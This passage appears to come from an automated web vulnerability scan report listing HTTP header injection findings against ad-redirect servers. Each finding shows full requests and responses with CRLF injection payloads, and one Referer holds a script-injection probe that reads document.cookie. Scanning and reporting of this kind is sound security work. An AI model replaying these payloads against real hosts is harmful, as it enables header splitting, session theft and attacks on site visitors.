Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:11 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk104110218044811833ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:11 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=30b9d
d888947672d
&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=104110218044811833&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1097

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.19. http://j.jioet.com/cgi/r [vkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the vkey request parameter is copied into the Location response header. The payload 23e2a%0d%0a3f19f058323 was submitted in the vkey parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=23e2a%0d%0a3f19f058323&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:05 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qhQqABU0AAEaLWAM; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:05 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:05 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk426110218044805062ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:05 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=23e2a
3f19f058323
&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=426110218044805062&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.20. http://member.internet.com/register [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://member.internet.com
Path:   /register

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2ba49%0d%0af6db1a0359b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2ba49%0d%0af6db1a0359b?gt HTTP/1.1
Host: member.internet.com
Proxy-Connection: keep-alive
Referer: http://isp.thelist.com/?4d0ed--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7894299f6b8=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801a81gABvEW; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; __utmz=175186238.1298033268.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026213892:ss=1298026071106; __utma=175186238.1586971603.1298033268.1298033268.1298033268.1; __utmc=175186238; __utmb=175186238.6.10.1298033268; _bizo_cksm_crc32=945E88E8; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=221%3D98%2C315%3D1352%2C

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:52:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /2ba49
f6db1a0359b

Content-Type: text/html
Content-Length: 0


2.21. http://o1.qnsr.com//cgi/c [a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   //cgi/c

Issue detail

The value of the a request parameter is copied into the Location response header. The payload 1dcd0%0d%0a41e1a72565e was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET //cgi/c?a=20127048;x=3584;c=203695854,203695854;i=0;n=203;s=9544;p=20830501;;;y=http://www.thelist.com/;;e=i;s=9544;g=254;w=0;m=0;z=1412312582;k=http://solutions.internet.com/5146_cloud-ssoban1dcd0%0d%0a41e1a72565e HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:22 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Location: http://solutions.internet.com/5146_cloud-ssoban1dcd0
41e1a72565e
?&CCID=20127048203695854&QTR=ZZf0Za20127048Zb0Zg172Zw56Zm0Zc203695854,203695854Zs9544ZZ&CLK=734110218044722769
Content-Type: text/html; charset=iso-8859-1
Content-Length: 431

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://solutions.internet.com/5146_cloud-ssoban1dc
...[SNIP]...

2.22. http://o1.qnsr.com//cgi/c [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   //cgi/c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 523ba%0d%0a01f8f6d3fe5 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET //cgi/c?a=20127048;x=3584;c=203695854,203695854;i=0;n=203;s=9544;p=20830501;;;y=http://www.thelist.com/;;e=i;s=9544;g=254;w=0;m=0;z=1412312582;k=http://solutions.internet.com/5146_cloud-ssoban&523ba%0d%0a01f8f6d3fe5=1 HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:32 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Location: http://solutions.internet.com/5146_cloud-ssoban&523ba
01f8f6d3fe5
=1?&CCID=20127048203695854&QTR=ZZf0Za20127048Zb0Zg172Zw56Zm0Zc203695854,203695854Zs9544ZZ&CLK=723110218044732893
Content-Type: text/html; charset=iso-8859-1
Content-Length: 438

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://solutions.internet.com/5146_cloud-ssoban&am
...[SNIP]...

2.23. http://o1.qnsr.com/cgi/r [&exp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/r

Issue detail

The value of the &exp request parameter is copied into the Location response header. The payload ddacd%0d%0a54f1c4d6f1f was submitted in the &exp parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=ddacd%0d%0a54f1c4d6f1f HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:02 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk452110218044802446ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:02 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==; path=/; EXPIRES=Sun, 20-Mar-11 12:48:02 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=452110218044802446&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=ddacd
54f1c4d6f1f
&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 593

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.vendorseek.com/website_design_services.
...[SNIP]...

2.24. http://o1.qnsr.com/cgi/r [;n parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/r

Issue detail

The value of the ;n request parameter is copied into the Location response header. The payload 67f65%0d%0a03a2929b961 was submitted in the ;n parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;67f65%0d%0a03a2929b961&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:24 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk466110218044724846ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:24 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: QCP201001141843480=NjdmNjUNCjAzYTI5MjliOTYxJkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NQ==; path=/; EXPIRES=Sun, 20-Mar-11 12:47:24 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=466110218044724846&67f65
03a2929b961
&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 594

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.vendorseek.com/website_design_services.
...[SNIP]...

2.25. http://o1.qnsr.com/cgi/r [CCID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/r

Issue detail

The value of the CCID request parameter is copied into the Location response header. The payload bc1f7%0d%0a3520e81e85c was submitted in the CCID parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=bc1f7%0d%0a3520e81e85c&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:35 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk486110218044735480ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:35 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: QCP201001141843480=JkNDSUQ9YmMxZjcNCjM1MjBlODFlODVjJlFUUj1aWmYwWmEyMDEyMzUxOVpiMFpnMTcyWnc1NlptMFpjMjAzNjMwOTEwLDIwMzYzMDkxMFpzOTU0NFpaJkNMSz0zOTQxMTAyMQ==; path=/; EXPIRES=Sun, 20-Mar-11 12:47:35 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=486110218044735480&&CCID=bc1f7
3520e81e85c
&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 577

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.vendorseek.com/website_design_services.
...[SNIP]...

2.26. http://o1.qnsr.com/cgi/r [CLK parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/r

Issue detail

The value of the CLK request parameter is copied into the Location response header. The payload fd955%0d%0a5e75bad9d9d was submitted in the CLK parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=fd955%0d%0a5e75bad9d9d&&exp=y HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:43 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk716110218044743211ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:43 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPWZkOTU1DQo1ZQ==; path=/; EXPIRES=Sun, 20-Mar-11 12:47:43 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=716110218044743211&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=fd955
5e75bad9d9d
&&exp=y&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 576

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.vendorseek.com/website_design_services.
...[SNIP]...

2.27. http://o1.qnsr.com/cgi/r [QTR parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/r

Issue detail

The value of the QTR request parameter is copied into the Location response header. The payload 8087b%0d%0aba64b5bd6e9 was submitted in the QTR parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=20123519203630910&QTR=8087b%0d%0aba64b5bd6e9&CLK=394110218044719808&&exp=y HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:41 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk902110218044741375ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:41 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPTgwODdiDQpiYTY0YjViZDZlOSZDTEs9Mzk0MTEwMjE4MDQ0NzE5ODA4JiZleHA9eQ==; path=/; EXPIRES=Sun, 20-Mar-11 12:47:41 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=902110218044741375&&CCID=20123519203630910&QTR=8087b
ba64b5bd6e9
&CLK=394110218044719808&&exp=y&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 536

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.vendorseek.com/website_design_services.
...[SNIP]...

2.28. http://o1.qnsr.com/cgi/r [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 73f58%0d%0abdb12e368f6 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&73f58%0d%0abdb12e368f6=1 HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:11 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk306110218044811267ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:11 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==; path=/; EXPIRES=Sun, 20-Mar-11 12:48:11 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=306110218044811267&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&73f58
bdb12e368f6
=1&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 601

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.vendorseek.com/website_design_services.
...[SNIP]...

2.29. http://tacoda.at.atwola.com/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
